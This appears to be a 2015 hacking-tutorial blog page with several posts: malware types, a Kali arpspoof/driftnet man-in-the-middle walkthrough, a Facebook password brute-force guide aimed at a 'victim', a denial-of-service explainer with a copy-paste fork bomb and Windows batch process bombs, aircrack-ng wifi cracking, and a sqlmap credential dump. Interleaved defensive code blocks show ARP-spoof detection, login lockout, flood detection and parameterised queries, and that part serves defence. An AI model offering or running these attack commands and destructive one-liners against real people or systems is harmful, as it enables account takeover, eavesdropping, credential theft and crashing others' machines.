Monday, 12 October 2015

On 23:38 by Himanshu Joshi
If you’re a regular or even an occasional computer user, you have probably heard terms like Viruses, Worms, Trojans, Bots, Malware and Spyware. Honestly speaking, most of us lump all of these together as ‘a virus’, whatever their actual type. But have you ever asked what the difference between these terms is? They are all meant to harm your device, steal your data or spy on you, so why are they named so differently? Basically, terms like Viruses and Trojans all denote types of malicious software, or simply ‘Malware’.
Now the first question that arises is: where did these terms come from? Clearly they are not aliens from another world; in fact they were not even created with the intention of harming anyone.
The history of malware goes back to 1949, when John von Neumann first developed the theoretical basis for self-replicating programs (self-reproducing automata), although a technical implementation was not feasible at the time. The term ‘Computer Virus’ was first used by Professor Leonard M. Adleman in 1981, in a conversation with Fred Cohen.
The first computer virus, named ‘Brain’, was written by two brothers, Basit Farooq Alvi and Amjad Farooq Alvi, from Lahore, Pakistan. Brain infected storage media using the MS-DOS FAT file system. It was designed for the IBM PC: it replaced the boot sector of a floppy disk with the virus code. The virus changed the disk label to ©Brain, and infected boot sectors displayed this message:
Welcome to the Dungeon (c) 1986 Basit & Amjads (pvt) Ltd VIRUS_SHOE RECORD V9.0 Dedicated to the dynamic memories of millions of viruses who are no longer with us today – Thanks GOODNESS!! BEWARE OF THE er..VIRUS : this program is catching program follows after these messages….$#@%$@!!
However, as you may presume, there was no evil intention behind it. In an interview with TIME magazine the Alvi brothers said they created the virus only to protect their medical software from piracy, as a response to copyright infringement.
Coming back to Malware: this is malicious software designed to harm a computer, whether or not it is connected to a network. Malware only comes into play when a computer is involved; otherwise the term has no meaning.
Malware comes in the following types:
Worms: These programs have the ability to replicate themselves. Their sole objective is to increase their numbers and transfer themselves to other computers via the internet or through storage media, all while hiding their movements from the user like a top secret mission. They don’t cause direct harm to the computer, but their replicating nature consumes disk space and slows the machine down. Some notable worms are SQL Blaster, which slowed the internet for a short period, and Code Red, which took down almost 359,000 websites.
Viruses: They also have the ability to replicate themselves, but they do damage files on the computer they attack. Their main weakness is that they can only act with the support of a host program; otherwise they’re like a defeated warrior. They attach themselves to songs, videos and executable files and travel all over the internet. W32.Sfc!mod, ABAP.Rivpas.A and Accept.3773 are some examples of virus programs.
The Virus Gang:
  • File Viruses
  • Macro Viruses
  • Master Boot Record Viruses
  • Boot Sector Viruses
  • Multi-Partite Viruses
  • Polymorphic Viruses
  • Stealth Viruses
Feel free to Google any of them if you like.
Trojans: Basically, Trojans are not viruses and are not meant to damage or delete files on your system. Their sole task is to provide a backdoor through which malicious programs or malevolent users can enter your system and steal your valuable data without your knowledge or permission. JS.Debeski.Trojan is an example of a Trojan.
They are named after the tale of the ‘Trojan Horse’, in which the Greeks entered the city of Troy with the help of a wooden horse that was presented as a gift but turned out to be a sweet poison, as depicted in the movie Troy.
The Trojan Gang:
  • Remote Access Trojans
  • Data Sending Trojans
  • Destructive Trojans
  • Proxy Trojans
  • FTP Trojans
  • Security Software Disabler Trojans
  • Denial-Of-Service Attack Trojans
Feel free to Google any of them if you like.
Adware: Adware is used to display advertisements inside programs. It generally comes bundled with free-to-use software, as advertising is the only source of revenue for the developers of those programs. Adware can’t entirely be called Malware, as it has no intention of harming your machine; it only tracks which advertisements you’re more interested in, so as to display relevant advertisements on your screen.
Spyware: These programs also come bundled with other freeware, track your browsing and other personal details, and send them to a remote user. They can also facilitate installation of unwanted software from the internet. Unlike Adware, they work as standalone programs and do their work silently.
Spam: Unwanted emails from unknown senders, which everyone finds irritating, are called Spam or junk mail. The process of flooding the internet with the same message is called Spamming, and is done for the purpose of commercial advertising. These junk mails may sometimes contain Viruses or Trojans that enter your system as soon as you open the mail.
Bots: Bots, or Robots, are automated processes designed to interact over the internet without the need for human interaction. They can be used with good or bad intentions. An evil-minded person can create a malicious Bot that is capable of infecting a host on its own. After transmitting itself to the host device, a Bot creates a connection to central servers that act as the command centres for all the infected hosts attached to that network, which is called a Botnet.
Their skills include stealing passwords, logging keystrokes, analysing network traffic, relaying spam, launching DoS (Denial of Service) attacks and opening back doors on infected hosts. These Bots can be seen as an advanced form of Worm: their infection rate and tactics are more effective than those of Worms. These malicious Bots are created after a lot of hard work by their malignant creators.
Ransomware: This type of malware alters the normal operation of your machine, barring you from using it properly. The program then displays warning messages asking for money to get your device back to normal working condition.
After reading all this, you might be wondering why people create Malware. Here are some reasons that may compel a coder to write malware:
  • To take control of a person’s computer for personal or professional reasons.
  • To gain financial benefits.
  • To steal confidential data.
  • To prove their point that a security breach can be carried out on a system.
  • To take down an individual computer or a complete network.
and many more….
How can you protect your computer:
  • Keep your system up to date.
  • Use genuine software.
  • Install antivirus software and update it regularly.
  • Set up a firewall, which may be a custom one provided by your antivirus software. Windows has a built-in firewall in case you don’t want to use a custom one.
  • Never open unknown emails, which generally end up in your Spam folder.
  • Never open unknown links; use an online website safety checker if you’re not sure about opening a website.
By taking these simple measures, you can effectively keep your machine free from Malware and other potential threats.
On 23:29 by Himanshu Joshi
Today’s tutorial is about the Kali Linux Man in the Middle Attack. How do you perform a man in the middle attack using Kali Linux? We will learn the step by step process.
I believe most of you already know the concept of a man in the middle attack, but if you still don’t, here is a definition from Wikipedia.
The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.
Scenario:
This is the simple scenario, and I have tried to draw it in a picture.
Kali Linux Man in the Middle Attack
Victim IP address : 192.168.8.90
Attacker network interface : eth0; with IP address : 192.168.8.93
Router IP address : 192.168.8.8
Requirements:
1. Arpspoof
2. Driftnet
3. Urlsnarf

Step by step Kali Linux Man in the Middle Attack :

1. Open your terminal (CTRL + ALT + T is the Kali shortcut) and configure the Kali Linux machine to allow packet forwarding. To act as the man in the middle, Kali Linux must act as a router between the "real router" and the victim. Read the tutorial on how to set up packet forwarding in Linux.
2. You can make the terminal view friendlier and easier to monitor by splitting the Kali Linux terminal window.
3. The next step is setting up arpspoof between the victim and the router.
arpspoof -i eth0 -t 192.168.8.90 192.168.8.8

4. Then set up arpspoof in the other direction, to capture all packets from the router to the victim.
arpspoof -i eth0 192.168.8.8 192.168.8.90

5. After steps three and four, all packets sent or received by the victim should be going through the attacker machine.

6. Now we can use driftnet to monitor all of the victim’s image traffic. According to its website,
Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.
7. To run driftnet, we just run this:
driftnet -i eth0
When the victim browses a website with images, driftnet will capture all image traffic, as shown in the screenshot below.

To stop driftnet, just close the driftnet window or press CTRL + C in the terminal.
8. For the next step we will try to capture website information by using urlsnarf. To use urlsnarf, just run this:
urlsnarf -i eth0
and urlsnarf will start capturing all website addresses visited by the victim machine.
9. When the victim browses a website, the attacker will know which address the victim visited.
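The flip side of the tutorial above is how a defender notices it. After the two arpspoof commands, the victim’s ARP cache shows the router’s IP (192.168.8.8) mapped to the attacker’s MAC, and that same MAC also answers for the attacker’s own IP. The following is an added example written for this page, not code from the tutorial or from the dsniff tools: it parses `ip neigh` style output (a constructed sample, with made-up MAC addresses) and flags exactly those two symptoms against a known-good gateway binding that you would record while the network is healthy.

```python
"""Detect ARP cache poisoning from a snapshot of the ARP table (added example)."""
import re
from collections import defaultdict

# Constructed sample of `ip neigh` output. The router 192.168.8.8 has been
# poisoned: it now maps to the attacker's MAC, which also answers for 192.168.8.93.
# The FAILED line has no lladdr and must be skipped, not crash the parser.
SAMPLE_ARP_TABLE = """\
192.168.8.8 dev eth0 lladdr aa:bb:cc:dd:ee:93 REACHABLE
192.168.8.93 dev eth0 lladdr aa:bb:cc:dd:ee:93 REACHABLE
192.168.8.1 dev eth0 lladdr 00:11:22:33:44:01 STALE
192.168.8.50 dev eth0 FAILED
"""

# Known-good gateway binding recorded on a clean network (assumed/made-up MAC).
KNOWN_GATEWAY = {"ip": "192.168.8.8", "mac": "00:11:22:33:44:08"}

LINE_RE = re.compile(
    r"^(?P<ip>\d+\.\d+\.\d+\.\d+)\s+dev\s+\S+\s+lladdr\s+(?P<mac>[0-9a-f:]{17})",
    re.IGNORECASE,
)


def parse_arp_table(text):
    """Return {ip: mac} from `ip neigh` style lines; entries without lladdr are ignored."""
    table = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def find_spoofing(table, known_gateway):
    """Return a list of alert strings: gateway MAC drift first, then MACs claiming several IPs."""
    alerts = []
    gw_mac = table.get(known_gateway["ip"])
    if gw_mac and gw_mac != known_gateway["mac"].lower():
        alerts.append(
            f"gateway {known_gateway['ip']} MAC changed: expected "
            f"{known_gateway['mac']}, saw {gw_mac}"
        )
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(f"MAC {mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    for alert in find_spoofing(parse_arp_table(SAMPLE_ARP_TABLE), KNOWN_GATEWAY):
        print("ALERT:", alert)
```

On a real host you would feed it the live output of `ip neigh` (or `arp -n` with the regex adjusted) from a cron job; the durable fix is a static ARP entry for the gateway on the hosts you control, and dynamic ARP inspection on managed switches.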
On 23:15 by Himanshu Joshi

Note: This Article Is Not For Noobs! Learners Are Welcomed! This Article Is For Educational Purposes Only, Any Misuse Of Information Given Below Is Prohibited! 

Hi Guys! I am back with a fresh tutorial, and this time it’s on hacking Facebook! The method I am going to use here is brute forcing, using the world’s best password dictionary, CrackStation.
So, first let’s learn something about brute force attacks:
“A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.”
But in our case I’ll be using a Python script and a long dictionary of passwords. I have personally tried it on myself and it really works :) .
Here’s the list of what we need:
  • A Kali Machine / Or Any Python Engine Will work!
  • Facebook.py ( v1 only)
  • And, A FaceBook id Of course :p
  • CrackStation Word List! (Download Here)
Now, Lets Start The Work!
Step 1. Install python-mechanize using the command mentioned below:
[*] root@HaCoder:~#apt-get install python-mechanize
Step 4. Make facebook.py executable and run it using the commands below:
[*] root@HaCoder~# chmod +x facebook.py
[*] root@HaCoder:~# python facebook.py

Step 5. Now enter the |Email|, |Phone number|, |Profile ID number| or |Username| of the victim. You can use graph.facebook.com for more information!
Step 6. Now give the path of your CrackStation word list!
Step 7. Now it will try all the passwords present in the word list, so relax and have a cup of coffee, because it will take time depending on the speed of your processor and the password strength of your victim!
Hope this article was helpful :) Any feedback or questions? Leave a comment and I’ll be happy to help :)
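Seen from the other side of the login form, the attack above only works when two controls are missing: nothing stops a user from choosing a password that sits in a public wordlist, and nothing slows down thousands of failed logins against one account. The block below is an added example for this page (not the facebook.py script and not anything from Facebook). It uses a tiny constructed wordlist in place of CrackStation and a fake clock so the lockout can be exercised without waiting; the account name and passwords are made up.

```python
"""Password-list rejection plus failed-login lockout (added example, defender side)."""
import hashlib
import hmac
import os
import time

# Constructed stand-in for a large breached-password dictionary such as CrackStation.
WORDLIST = {"123456", "password", "qwerty", "letmein", "iloveyou"}

MAX_FAILURES = 5           # failures allowed inside the window before lockout
WINDOW_SECONDS = 300       # failures older than this are forgotten
BASE_LOCKOUT_SECONDS = 60  # first lockout length; doubles on each further lockout


def password_is_acceptable(password, wordlist=WORDLIST, min_length=12):
    """Reject short passwords and anything in the known-cracked list (case-insensitive)."""
    return len(password) >= min_length and password.lower() not in wordlist


def hash_password(password, salt=None, iterations=100_000):
    """Salted PBKDF2-HMAC-SHA256; returns (salt, digest). Slow by design."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


class LoginGuard:
    """Tracks failures per account and applies an escalating lockout."""

    def __init__(self, now=time.time):
        self.now = now            # injectable clock so tests need not sleep
        self.failures = {}        # account -> list of failure timestamps
        self.locked_until = {}    # account -> time the lockout expires
        self.lockouts = {}        # account -> number of lockouts so far

    def is_locked(self, account):
        return self.now() < self.locked_until.get(account, 0)

    def record_failure(self, account):
        t = self.now()
        recent = [ts for ts in self.failures.get(account, []) if t - ts <= WINDOW_SECONDS]
        recent.append(t)
        self.failures[account] = recent
        if len(recent) >= MAX_FAILURES:
            n = self.lockouts.get(account, 0)
            self.locked_until[account] = t + BASE_LOCKOUT_SECONDS * (2 ** n)
            self.lockouts[account] = n + 1
            self.failures[account] = []

    def record_success(self, account):
        self.failures.pop(account, None)


def attempt_login(guard, account, password, stored):
    """stored is (salt, digest). Returns "locked", "ok" or "bad"."""
    if guard.is_locked(account):
        return "locked"          # do not even check the password while locked
    salt, digest = stored
    _, candidate = hash_password(password, salt)
    if hmac.compare_digest(candidate, digest):
        guard.record_success(account)
        return "ok"
    guard.record_failure(account)
    return "bad"


if __name__ == "__main__":
    guard = LoginGuard()
    stored = hash_password("correct horse battery staple")   # made-up password
    for guess in ["123456", "qwerty", "letmein", "iloveyou", "password", "correct horse battery staple"]:
        print(guess, "->", attempt_login(guard, "alice", guess, stored))
```

The demo at the bottom shows the sixth attempt, which is the right password, being answered with "locked": a wordlist of millions of entries gets five tries per lockout window instead of an unlimited run. The lockout doubles each time it trips, so a patient attacker is slowed exponentially while a legitimate user who mistypes a few times waits a minute.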
On 00:08 by Himanshu Joshi
Just like most other things associated with hacking, a denial of service attack is not everyone’s cup of tea. It can, however, be understood if explained properly. In this tutorial, I’ll try to give you the big picture of denial of service attacks before I start using geeky terms like packets. We’ll start at the easiest point.

What effect does a denial of service attack have?

Wireless hacking usually gives you the password of a wireless network. A man in the middle attack lets you spy on network traffic. Exploiting a vulnerability and sending a payload gives you access to and control over the target machine. What exactly does a Denial of Service (DOS) attack do? Basically, it robs the legitimate owner of a resource of the right to use it. I mean, if I successfully perform a DOS on your machine, you won’t be able to use it any more. In the modern scenario, it is used to disrupt online services. Many hacktivist groups (internet activists who use hacking as a form of active resistance; a name worth mentioning here is Anonymous) carry out Distributed Denial of Service attacks on government and private websites to make them listen to the people’s opinion (the legitimacy of this method of pushing your opinion has been a topic of debate, and a lot of hacktivists have had to serve jail time for participating in DDOS). So basically it’s just what its name suggests: Denial Of Service.

Basic Concept

It uses the fact that while a service may be more than sufficient to cater to the demands of its intended users, a drastic increase in unwelcome users can make the service go down. Most of us say things like "This website was down the other day" without any idea what it actually means. Well, now you do. To give you a good idea of what is happening, I’ll take an example from the movie "We Are Legion".

Scenario One : Multiplayer online game

Now consider that you are playing an online multiplayer game. There are millions of other people who also play this game. Now there’s a pool in the game that everyone likes to visit. You and your friends know that you have the power of numbers. There are a lot of you, and together you decide to make identical characters in the game. Then all of you go and block access to the pool. You have just carried out a denial of service attack. The users of the game have now been deprived of a service which they obtained the right to use when they signed up for the game. This is just what the guys at 4chan (birthplace and residence of Anonymous) did a long time ago. This is the kind of thing that gives you a very basic idea of what a denial of service attack can be.
Denial of service in a game
They made a Swastika and blocked access to the pool

Scenario 2 : Bus stop

Now assume that for some reason you want to disrupt the bus service of your city and stop people from using it. To stop legitimate people from using the service, you can ask your friends to use it unnecessarily. Basically, you can invite millions of friends to crowd around all the bus stops and ride the buses without any purpose. In practice this is not feasible, since you don’t have millions of friends, and they are definitely not going to waste their time and money riding aimlessly from one place to another.

So while this may seem impossible in the real world, in the virtual world you alone can cause as much load as a thousand (or even a million) users at the click of a button. There are many tools out there for this purpose; however, you are not advised to use them, as a DOS on someone else is illegal and easy to detect (Knock, knock. It’s the police). We will come back to this later and do a DOS on our own computer.

How denial of service attacks are carried out

Basically, when you visit a website, you send it a request to deliver its content to you. What you send is a packet. In reality it takes more than just one packet; you need a lot of them. Still, the bandwidth you consume in requesting the server to send you some data is very small. In return, the data it sends you is huge. This takes up server resources, which the company pays for. A legitimate page view can easily earn more than the server costs, on account of advertisements and so on, so companies buy servers that can provide enough data transfer for their regular users. However, if the number of users suddenly increases, the server gives up. It goes down. And once the company knows it is under DOS, it just turns off the server, so that it does not waste money on a DOS, and waits until the DOS stops.

Now with modern computers and bandwidth, one person alone can easily pretend to be a thousand or even more users at once. While this is not good for the server, it is not something that can make it succumb (your computer is not the only thing that gets better with time; the servers do too). However, if a lot of people like you do a DOS attack together, it becomes a distributed denial of service attack. This can easily be fatal for a server. It’s just like going to a page and refreshing it very fast, maybe a thousand times every second, while thousands of others do the same thing. So basically you are equivalent to more than a million users using the site simultaneously, and that’s not something the server can take.

Sites like Google and Facebook have stronger servers, and algorithms that can easily identify a DOS and block the traffic from that IP. But it’s not just the websites that get better; the black hat hackers are improving every day too. This leaves a huge scope for understanding DOS attacks and becoming an asset to one of these sides (the good, the bad and the ugly).

A Live DOS on your Kali Machine

If you have Kali Linux (the hacker’s OS, and the OS of choice if you use this blog) then here’s a small exercise for you.
We are going to execute a command in the Kali Linux terminal that will cripple the operating system and make it hang. It will most probably work on other Linux distributions too.
Warning: This code will freeze Kali Linux, and most probably it will not recover from the shock. You’ll lose any unsaved data. You will have to restart the machine the hard way (turn off the virtual machine directly, or cut the power supply if it’s a real machine). Just copy and paste the code and your computer is gone.
:(){ :|:& };:

The machine froze right after I pressed enter. I had to power it off from the VMware interface.
What basically happened is that the one-line command asked the operating system to keep spawning new processes as fast as it could, with no limit. It just gave up.
Here's something for the Windows Users

Crashing Windows Using Batch file

Open a notepad. Put the following code in it-
:1
Start
goto 1
Save the file as name.bat
.bat is the batch file extension. Run it. Game over.
It executes the second line, and the third line makes it go back to the first, execute the second, then back to the first again, execute the second... infinitely. So again, denial of service: all the processing power is used by a useless command, while you, the legitimate user, can’t do anything.

That's it for this tutorial, we'll discuss the technical details of a practical denial of service in a later tutorial.

PS:
As suggested in the comments, this script will crash Windows much faster:

:1
bash name.bat
goto 1

If you look at the script carefully, it is quite easy to understand what it does. Every time the script is executed, it does two things:

  1. Opens another instance of the same script
  2. Goes to the beginning of the script
So with every execution, the number of scripts slowing down your computer doubles. This means that instead of linear, the load on memory and processor is now exponential (the script gets more and more dangerous with time).
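The "refresh a thousand times a second" picture above is also what a DOS looks like in the server’s own access log, and that is where a defender catches it. The following is an added example written for this page (not from the tutorial or any DOS tool): it parses web server log lines in the common Apache/nginx combined format, counts requests per client per second, and reports any client whose peak rate crosses a threshold. The log lines are constructed, and the client addresses are RFC 5737 documentation addresses, not real hosts.

```python
"""Flag request floods from access-log lines (added example, detection side)."""
import re
from collections import defaultdict
from datetime import datetime

# Combined log format: ip ident user [timestamp] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def make_sample():
    """Constructed log: one normal client and one client firing 30 requests in one second."""
    lines = ['203.0.113.5 - - [12/Oct/2015:23:40:01 +0000] "GET /index.html HTTP/1.1" 200 5120']
    lines += ['198.51.100.7 - - [12/Oct/2015:23:40:02 +0000] "GET / HTTP/1.1" 200 5120'
              for _ in range(30)]
    lines.append('203.0.113.5 - - [12/Oct/2015:23:40:03 +0000] "GET /about.html HTTP/1.1" 200 2048')
    lines.append('this line is corrupt and must be skipped')
    return lines


def parse_line(line):
    """Return (ip, unix_second) for a combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FORMAT)
    return m.group("ip"), int(ts.timestamp())


def peak_rates(lines):
    """Return {ip: highest number of requests seen in any single second}."""
    buckets = defaultdict(lambda: defaultdict(int))
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue                    # malformed line: skip rather than crash the monitor
        ip, second = parsed
        buckets[ip][second] += 1
    return {ip: max(per_second.values()) for ip, per_second in buckets.items()}


def flag_floods(lines, threshold=20):
    """Clients whose peak per-second rate exceeds the threshold, sorted for stable output."""
    return sorted(ip for ip, peak in peak_rates(lines).items() if peak > threshold)


if __name__ == "__main__":
    sample = make_sample()
    print("peak requests/second per client:", peak_rates(sample))
    print("flooding clients:", flag_floods(sample))
```

A single flooding client like this one is what a per-IP rate limit on the server (or its reverse proxy) handles; the distributed case described above shows up as many clients each just under the threshold, which is why real deployments also watch the aggregate rate and request shape, not only per-IP counts.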

On 00:06 by Himanshu Joshi

First, create a wireless network of your own to crack. Don’t use this method on others; it is illegal. Then proceed with the steps below.

1. Find out the name of your wireless adapter.



Alright, now, your computer has many network adapters, so to scan with one, you need to know its name. These are basically the things you need to know:
  • lo - loopback. Not important currently.
  • eth - ethernet
  • wlan - This is what we want. Note the suffix associated.
Now, to see all the adapters, type ifconfig in a terminal. Look at the result and note down the wlan(0/1/2) adapter.





2. Enable Monitor mode

Now, we use a tool called airmon-ng to create a virtual monitor-mode interface called mon0. Just type
airmon-ng start wlan0
Your mon0 interface will be created.



3. Start capturing packets

Now, we’ll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets it sees, and you’ll see the name of the wifi you want to hack.
airodump-ng mon0


4. Store the captured packets in a file 

This can be achieved by giving some more parameters to the airodump command:
airodump-ng mon0 --write name_of_file

Now the captured packets will be stored in name_of_file-01.cap (airodump-ng appends a sequence number to the file name).
You have to wait till you have enough data (10000 packets minimum).


5. Crack the wifi

If all goes well, then you’ll be sitting in front of your PC, grinning, because you’ve finally got 10000 packets (don’t stop the packet capture yet). Now you can use aircrack-ng to crack the password (in a new terminal):
aircrack-ng name_of_file-01.cap 
The program will ask which wifi to crack if there are multiple available. Choose the wifi and it’ll do its job. If the password is weak enough, you’ll get it in front of you. If not, the program will tell you to get more packets; it will retry when there are 15000 packets, and so on.
On 00:01 by Himanshu Joshi


A screenshot from the SQLmap official website

Kali Linux

First off, you need to have Kali Linux (or BackTrack) up and running on your machine. Any other Linux distro might work, but you’ll need to install sqlmap yourself.

Sqlmap


Basically it’s just a tool to make SQL injection easier. Its official website introduces the tool as: "sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections."
A lot of features are listed on the sqlmap website, the most important being: "Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems." That’s basically all the database management systems. Most of the time you’ll never come across anything other than MySQL.

Hacking Websites Using Sqlmap in Kali linux

SQL Version

Boot into your Kali Linux machine. Start a terminal, and type:
sqlmap -h
It lists the basic options supported by sqlmap. To start with, we’ll execute a simple command,
sqlmap -u <URL to inject>. In our case, it will be:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
Sometimes, using --time-sec helps to speed up the process, especially when the server responses are slow.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
Either way, when sqlmap is done, it will tell you the MySQL version and some other useful information about the database.
The final result of the above command should be something like this.
Note: Depending on a lot of factors, sqlmap may sometimes ask you questions which have to be answered with yes/no. Typing y means yes and n means no. Here are a few typical questions you might come across:
  • A message saying that the database is probably MySQL, asking whether sqlmap should skip all other tests and conduct MySQL tests only. Your answer should be yes (y).
  • A message asking whether or not to use the payloads for specific versions of MySQL. The answer depends on the situation. If you are unsure, then it’s usually better to say yes.

Enumeration

Database

In this step, we will obtain the database name, column names and other useful data from the database.
List of a few common enumeration commands
So first we will get the names of the available databases. For this we will add --dbs to our previous command. The final command will look like:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
So the two databases are acuart and information_schema.

Table

Now we are obviously interested in the acuart database. information_schema can be thought of as a default database present on all your targets; it contains information about the structure of databases, tables, etc., but not the kind of data we are looking for. It can, however, be useful on a number of occasions. So now we will specify the database of interest using -D and tell sqlmap to list the tables using --tables. The final sqlmap command will be:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
The result should be something like this:
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns

Now we will specify the database using -D, the table using -T, and then request the columns using --columns. I hope you guys are starting to see the pattern by now. The most appealing table here is users. It might contain the usernames and passwords of registered users on the website (hackers always look for sensitive data).
The final command must be something like:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
The result would resemble this:

Data

Now, if you were following along attentively, you would expect that we will now be getting data from one of the columns. While that hypothesis is not completely wrong, it’s time we go one step further: we will be getting data from multiple columns. As usual, we will specify the database with -D, the table with -T, and the columns with -C. We will get all data from the specified columns using --dump. We will enter multiple columns and separate them with commas. The final command will look like this:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump
Here’s the result:
John Smith, of course. And the password is test. The email is email@email.com?? Okay, nothing great, but in real-world web pentesting you can come across more sensitive data. Under such circumstances, the right thing to do is to mail the admin of the website and tell them to fix the vulnerability ASAP. Don’t get tempted to join the dark side; you don’t look pretty behind bars. That’s it for this tutorial. Try looking at other columns and tables and see what you can dig up. Take a look at the previous tutorial on manual SQL injection, which will help you find more vulnerable sites.
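Since the tutorial ends by telling you to have the admin fix the flaw, here is what that fix is. The `cat=1` parameter is injectable because the page pastes it straight into the SQL text, so `1 OR 1=1` changes the query instead of being a value. The block below is an added example written for this page (not sqlmap’s code and not the vulnweb site’s source): it builds a small in-memory SQLite database shaped like the acuart example (a products table with a cat column, and a users table), then runs the same lookup the vulnerable way and the parameterised way so the difference is visible.

```python
"""Vulnerable vs. parameterised product lookup (added example)."""
import sqlite3


def make_db():
    """Constructed stand-in for the acuart database; rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, cat INTEGER);
        CREATE TABLE users (name TEXT, email TEXT, pass TEXT);
        INSERT INTO products VALUES (1, 'Poster', 1), (2, 'Print', 2), (3, 'Canvas', 2);
        INSERT INTO users VALUES ('John Smith', 'email@email.com', 'test');
    """)
    return conn


def list_products_vulnerable(conn, cat):
    # The request parameter is concatenated into the statement, so whoever controls
    # ?cat= controls the SQL. This is the listproducts.php pattern sqlmap exploits.
    sql = "SELECT name FROM products WHERE cat = " + cat
    return [row[0] for row in conn.execute(sql)]


def list_products_safe(conn, cat):
    # Validate the type first, then bind the value. A bound parameter is sent as data,
    # never parsed as SQL, so no input can alter the WHERE clause.
    cat_id = int(cat)            # raises ValueError for anything that is not a number
    rows = conn.execute("SELECT name FROM products WHERE cat = ?", (cat_id,))
    return [row[0] for row in rows]


def safe_lookup_rejects(conn, cat):
    """True if the hardened lookup refuses the input instead of running it."""
    try:
        list_products_safe(conn, cat)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, cat=1        :", list_products_vulnerable(db, "1"))
    print("vulnerable, cat=1 OR 1=1 :", list_products_vulnerable(db, "1 OR 1=1"))
    print("safe, cat=1              :", list_products_safe(db, "1"))
    print("safe rejects 1 OR 1=1    :", safe_lookup_rejects(db, "1 OR 1=1"))
```

The tautology turns a one-row query into the whole table in the vulnerable version, which is the same leverage sqlmap automates all the way to `--dump`; in the hardened version the same input never reaches the database. The `?` placeholder is SQLite’s style; MySQL’s drivers use `%s` or `?` depending on the library, but the principle (bind, don’t concatenate) is identical.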

Sunday, 11 October 2015

On 22:27 by Himanshu Joshi
Just hold down the Shift key and right-click on the desktop.



And then you can choose “Open Command Window Here” from the menu. The great thing about this is that the current path is the desktop, which is convenient for manipulating files on the desktop.

Of course you can always right-click on any folder icon in the system while holding down the shift key.
On 22:26 by Himanshu Joshi


Just follow the steps given below:
Insert your USB drive into your system and wait for it to be recognised.

STEP 1: Go to Start > Control Panel > Administrative Tools > Computer Management > Disk Management
Or
You can go there directly by typing this command in Run: diskmgmt.msc



Then right-click the partition whose letter you want to change (click in the white area just below the word “Volume”) and select “Change Drive Letter and Paths”.



From here you can reassign the drive letter to “A”.
NOTE: The drive letter of the pendrive must be “A”.

STEP 2: Start -> Run -> syskey



Click “OK”.



Syskey launched: Click “Update”



Choose “Store Startup key on floppy disk” and click “OK”



You’ll be prompted to insert your diskette. Make sure your USB drive is inserted and writable.
Restart and have fun. Don’t lose your USB disk! Also, to revert this, you can run syskey again and choose to store the key locally instead of “on a floppy disk”.